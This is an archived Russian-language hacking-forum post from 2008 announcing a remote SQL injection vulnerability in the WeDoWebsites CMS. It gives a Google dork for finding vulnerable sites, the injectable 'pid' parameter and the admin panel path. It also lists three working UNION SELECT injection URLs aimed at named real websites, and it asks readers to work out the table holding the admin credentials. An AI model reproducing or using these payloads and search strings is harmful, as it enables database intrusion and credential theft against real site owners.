Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
WeDoWebsites CMS Remote SQL Injection Vulnerability |
04.01.2008, 08:33
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
WeDoWebsites CMS Remote SQL Injection Vulnerability
*******************WeDoWebsites Content Management System*******************
AUTHOR: Ded MustD!e
GOOGLE DORK: "Powered by a WeDoWebsites Content Management System"
LINK: http://www.wedowebsites.co.nz/
EXPLOIT: http://site.com/xxxxx.php?pid=[SQL-INJ]
DETAILS: колонок 6, а вот таблицу с данными админа я подобрать так и не смог, хотя префикс вроде не используется; админка: http://site.com/admin/
EXAMPLES:
Код:
http://www.whiteelephant.co.nz/abeltasmanbackpackers.php?pid=-1+union+select+1,2,3,4,conca t_ws(0x3a,user(),version(),database()),6/*
Код:
http://www.vistadesign.co.nz/landscapedesigners.php?pid=-1+union+select+1,2,concat_ws(0x3a, user(),version(),database()),4,5,6/*
Код:
http://www.villaonthebay.co.nz/holidayhomegallery.php?pid=-1+union+select+1,2,3,4,concat_ws( 0x3a,user(),version(),database()),6/*
P.S. А вообще в гугле 5 страниц с примерами  . Если кто-нибудь подберет таблицу, напишите сюда или мне в ПМ, буду благодарен.
************************************************** ************************* |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид